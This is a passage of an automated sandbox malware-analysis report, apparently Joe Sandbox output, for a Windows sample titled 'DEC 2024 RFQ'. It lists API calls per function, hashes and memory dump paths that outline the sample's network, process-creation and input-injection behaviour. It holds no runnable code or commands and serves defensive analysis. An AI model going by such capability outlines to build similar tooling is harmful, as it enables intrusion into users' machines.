                                                                                                                      • Opcode ID: 9e7703aee35dc08d3c387cf736ff8c4d35ec722bb2744976ce9b799021721d8f
                                                                                                                      • Instruction ID: 6d452dfe218daea47493f1b85f5a7d8d575247e4cc8a064167c37a9b81d8acac
                                                                                                                      • Opcode Fuzzy Hash: 9e7703aee35dc08d3c387cf736ff8c4d35ec722bb2744976ce9b799021721d8f
                                                                                                                      • Instruction Fuzzy Hash: F0212974E00209BFDF10ABA0CC85EFEBBB8EF45300F004016F915972A2DB795825DB64
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32 ref: 0007916F
                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00079184
                                                                                                                      • _wcscmp.LIBCMT ref: 00079196
                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00079211
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                      • API String ID: 1704125052-3381328864
                                                                                                                      • Opcode ID: 79ae5ccd51baba624810ecd212f481aaf87481f7dc898c7ac3d1d83c274661a6
                                                                                                                      • Instruction ID: 45002968cd0cf99bc9dadd897aa2a56afec3e666f97bbe1479e6d1c4a2fc4984
                                                                                                                      • Opcode Fuzzy Hash: 79ae5ccd51baba624810ecd212f481aaf87481f7dc898c7ac3d1d83c274661a6
                                                                                                                      • Instruction Fuzzy Hash: 27110A77688307BAFA213624DC16DE7779C9B15720B204027FA08E41D3FE659852559C
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000988D7
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00098904
                                                                                                                      • CoUninitialize.OLE32 ref: 0009890E
                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00098A0E
                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00098B3B
                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,000B2C0C), ref: 00098B6F
                                                                                                                      • CoGetObject.OLE32(?,00000000,000B2C0C,?), ref: 00098B92
                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00098BA5
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00098C25
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00098C35
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2395222682-0
                                                                                                                      • Opcode ID: 475028138b9016294f0ae633ffebd2f529521457e07483ee8fb27c1134fecd11
                                                                                                                      • Instruction ID: 88e9b85f05fdf62119beda88c3aa321027f325f6c68dfcf5376ca9ff41b8ea77
                                                                                                                      • Opcode Fuzzy Hash: 475028138b9016294f0ae633ffebd2f529521457e07483ee8fb27c1134fecd11
                                                                                                                      • Instruction Fuzzy Hash: 10C125B1608305AFDB00DF64C88496BB7E9FF8A348F04895DF98A9B251DB71ED05CB52
                                                                                                                      APIs
                                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00087A6C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafeVartype
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1725837607-0
                                                                                                                      • Opcode ID: 04c659fe03eab09d6d0514614d92b214608a1c92451892916d80a0c596a8c794
                                                                                                                      • Instruction ID: 4e0fc791bb3a3b13189b93b143002debf377256609627a25f2ae69e409a47116
                                                                                                                      • Opcode Fuzzy Hash: 04c659fe03eab09d6d0514614d92b214608a1c92451892916d80a0c596a8c794
                                                                                                                      • Instruction Fuzzy Hash: DFB18C7190421A9FDB10EFA4C884BFEBBF5FF49321F244429E689A7256D734E941CB90
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000811F0
                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00080268,?,00000001), ref: 00081204
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0008120B
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00080268,?,00000001), ref: 0008121A
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0008122C
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00080268,?,00000001), ref: 00081245
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00080268,?,00000001), ref: 00081257
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00080268,?,00000001), ref: 0008129C
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00080268,?,00000001), ref: 000812B1
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00080268,?,00000001), ref: 000812BC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2156557900-0
                                                                                                                      • Opcode ID: ffdf121a980c4344bb93c03eecca6687d02bc12dcd7823f48fc527e6935e83a8
                                                                                                                      • Instruction ID: 8a8ed6f42bef9c0d19fb86804ab88c2686dc79304e80afdaa767417befe526ef
                                                                                                                      • Opcode Fuzzy Hash: ffdf121a980c4344bb93c03eecca6687d02bc12dcd7823f48fc527e6935e83a8
                                                                                                                      • Instruction Fuzzy Hash: 3F31DD75600204FBEBA0AF90FC88FB937EDBF657A1F104125F840EA1A1D3B99D418B60
                                                                                                                      APIs
                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0002FAA6
                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 0002FB45
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 0002FC9C
                                                                                                                      • DestroyWindow.USER32(?), ref: 000645D6
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0006463B
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00064668
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                      • Opcode ID: f974c60f220c8ed65b0222456a3e10ba21fe0405ea2c0bae0da5f854f658833c
                                                                                                                      • Instruction ID: b68128da976714371dd8f0e62de40273c4971fc5c5647ca18530801d7c66573a
                                                                                                                      • Opcode Fuzzy Hash: f974c60f220c8ed65b0222456a3e10ba21fe0405ea2c0bae0da5f854f658833c
                                                                                                                      • Instruction Fuzzy Hash: 4DA19C70701222CFDB69EF14D995AB9F3A5BF05740F5442BDE80AAB262CB30AD16CF51
                                                                                                                      APIs
                                                                                                                      • EnumChildWindows.USER32(?,0007A439), ref: 0007A377
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                      • Opcode ID: f71bd57bc31380ea0d70990a6e93a400c37f30dd3cd4a425b74fe7b282d6ece1
                                                                                                                      • Instruction ID: 2c25dc6cbbcbb1fba04bdf281cb7e066b5a3334a0e3f727d600af13ff3943809
                                                                                                                      • Opcode Fuzzy Hash: f71bd57bc31380ea0d70990a6e93a400c37f30dd3cd4a425b74fe7b282d6ece1
                                                                                                                      • Instruction Fuzzy Hash: 2891F671B00606AACB48DFA4C451BEDFBB4BF45310F50C129E44DA3252DF356A99CBE9
                                                                                                                      APIs
                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00022EAE
                                                                                                                        • Part of subcall function 00021DB3: GetClientRect.USER32(?,?), ref: 00021DDC
                                                                                                                        • Part of subcall function 00021DB3: GetWindowRect.USER32(?,?), ref: 00021E1D
                                                                                                                        • Part of subcall function 00021DB3: ScreenToClient.USER32(?,?), ref: 00021E45
                                                                                                                      • GetDC.USER32 ref: 0005CD32
                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0005CD45
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0005CD53
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0005CD68
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0005CD70
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0005CDFB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                      • Opcode ID: d96c5e68b425d4b3a0c39382aa53212dff29a12e37e48fe18f768ebcbdcd990f
                                                                                                                      • Instruction ID: 0772cfc49e034a4c398a379a689b549be1488417b9ddf7257625e5766159d36a
                                                                                                                      • Opcode Fuzzy Hash: d96c5e68b425d4b3a0c39382aa53212dff29a12e37e48fe18f768ebcbdcd990f
                                                                                                                      • Instruction Fuzzy Hash: F871BD31400205EFEF618FA4DC80EEB7BB5FF49326F14466AED559A2A6C7348C84DB60
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00091A50
                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00091A7C
                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00091ABE
                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00091AD3
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00091AE0
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00091B10
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00091B57
                                                                                                                        • Part of subcall function 00092483: GetLastError.KERNEL32(?,?,00091817,00000000,00000000,00000001), ref: 00092498
                                                                                                                        • Part of subcall function 00092483: SetEvent.KERNEL32(?,?,00091817,00000000,00000000,00000001), ref: 000924AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2603140658-3916222277
                                                                                                                      • Opcode ID: c4a5e969eaa483d6cbff5b45f22ae2e3769bdd0bd4558090462e523d8c2ac099
                                                                                                                      • Instruction ID: e9aedccb12ab4b86b9582b747820b97c69a86afe273932418080b7c06e8b4ba2
                                                                                                                      • Opcode Fuzzy Hash: c4a5e969eaa483d6cbff5b45f22ae2e3769bdd0bd4558090462e523d8c2ac099
                                                                                                                      • Instruction Fuzzy Hash: DF417FB160161ABFEF118F50CC89FFE7BADEF09354F004126F9059A191E7749E44ABA1
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,000AF910), ref: 00098D28
                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,000AF910), ref: 00098D5C
                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00098ED6
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00098F00
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 560350794-0
                                                                                                                      • Opcode ID: 84f238c59ca5f72790dda1dca56ec30234c4b5f1c9d69d9210265ed37b15c450
                                                                                                                      • Instruction ID: 5daa8ed4c3f55667233ea457d5c263c74a7ec437df5764d4b625fa5c11b47eaa
                                                                                                                      • Opcode Fuzzy Hash: 84f238c59ca5f72790dda1dca56ec30234c4b5f1c9d69d9210265ed37b15c450
                                                                                                                      • Instruction Fuzzy Hash: 41F14771A00209AFDF54DF98C884EEEB7B9FF89314F108498F915AB251DB31AE45DB90
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0009F6B5
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0009F848
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0009F86C
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0009F8AC
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0009F8CE
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0009FA4A
                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0009FA7C
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0009FAAB
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0009FB22
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4090791747-0
                                                                                                                      • Opcode ID: 53199f5d5a876aa3ba71027737651b69778b79fdb1b9ed910ab9f77e36766345
                                                                                                                      • Instruction ID: 7cd8c5260fa7dd54c787aa584a74824f77881fd15d4b77361d28d34e1532d65c
                                                                                                                      • Opcode Fuzzy Hash: 53199f5d5a876aa3ba71027737651b69778b79fdb1b9ed910ab9f77e36766345
                                                                                                                      • Instruction Fuzzy Hash: 7EE1BF716043029FCB15EF24C881BBABBE5EF85354F18856DF8999B2A2CB31DC41DB52
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0008466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00083697,?), ref: 0008468B
                                                                                                                        • Part of subcall function 0008466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00083697,?), ref: 000846A4
                                                                                                                        • Part of subcall function 00084A31: GetFileAttributesW.KERNEL32(?,0008370B), ref: 00084A32
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00084D40
                                                                                                                      • _wcscmp.LIBCMT ref: 00084D5A
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00084D75
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 793581249-0
                                                                                                                      • Opcode ID: 3dadbf0ccfe7873710b9ee29c741a2d9a92039b0277382de44ee4a2485ac7efa
                                                                                                                      • Instruction ID: 13aaa46d24e98278f66f0ffeb2fb0d5770cabe9b9bf0c4b04fa218e6de55e667
                                                                                                                      • Opcode Fuzzy Hash: 3dadbf0ccfe7873710b9ee29c741a2d9a92039b0277382de44ee4a2485ac7efa
                                                                                                                      • Instruction Fuzzy Hash: 395144B25083459BC765EBA0DC819DFB3ECAF85350F40092EB6C9D3152EF74A588C756
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000A86FF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 634782764-0
                                                                                                                      • Opcode ID: c9ef8ed2d181b63f67353897d94d3a745d12ce2e9f50a392b0438434e54d1624
                                                                                                                      • Instruction ID: e0c9deee47a137ec18996a25bf6160ce1578b487b55a677404e826352458ed79
                                                                                                                      • Instruction Fuzzy Hash: 8E51C130604254BEEB749BA8DC85FED7BA5EB07760F608125F950EA1A1DF76E980CB40
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0005C2F7
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0005C319
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0005C331
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0005C34F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0005C370
                                                                                                                      • DestroyIcon.USER32(00000000), ref: 0005C37F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0005C39C
                                                                                                                      • DestroyIcon.USER32(?), ref: 0005C3AB
                                                                                                                        • Part of subcall function 000AA4AF: DeleteObject.GDI32(00000000), ref: 000AA4E8
                                                                                                                      Similarity
                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2819616528-0
                                                                                                                      • Opcode ID: 2414dbc7b14fcd12f5f35efc6c0a4981d0b5707bf70491a115ce337d296dbd97
                                                                                                                      • Instruction ID: fa661b04686473a7723ad6b8e8b5c7d8ddf0892a977a3879300719daac4f3fd3
                                                                                                                      • Instruction Fuzzy Hash: 5E515870A00719EFEB20DFA4DC45FAE3BE5EB49711F104528F942A72A0DB74AD90DB50
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0007A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0007A84C
                                                                                                                        • Part of subcall function 0007A82C: GetCurrentThreadId.KERNEL32 ref: 0007A853
                                                                                                                        • Part of subcall function 0007A82C: AttachThreadInput.USER32(00000000,?,00079683,?,00000001), ref: 0007A85A
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0007968E
                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000796AB
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 000796AE
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000796B7
                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000796D5
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000796D8
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000796E1
                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000796F8
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000796FB
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2014098862-0
                                                                                                                      • Opcode ID: f6b2212b9db71968dee2fded102d704d69653d06aef5cb04467e385664eca720
                                                                                                                      • Instruction ID: f3ffb80e29b73b7b689ab4d9d78829482370eb2b9e974754842c62497a2e9922
                                                                                                                      • Instruction Fuzzy Hash: D711E571910A19BEF6106FA0DC89F7A3B1DEB4D750F100425F244AB0E1C9F65C11DAA8
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0007853C,00000B00,?,?), ref: 0007892A
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,0007853C,00000B00,?,?), ref: 00078931
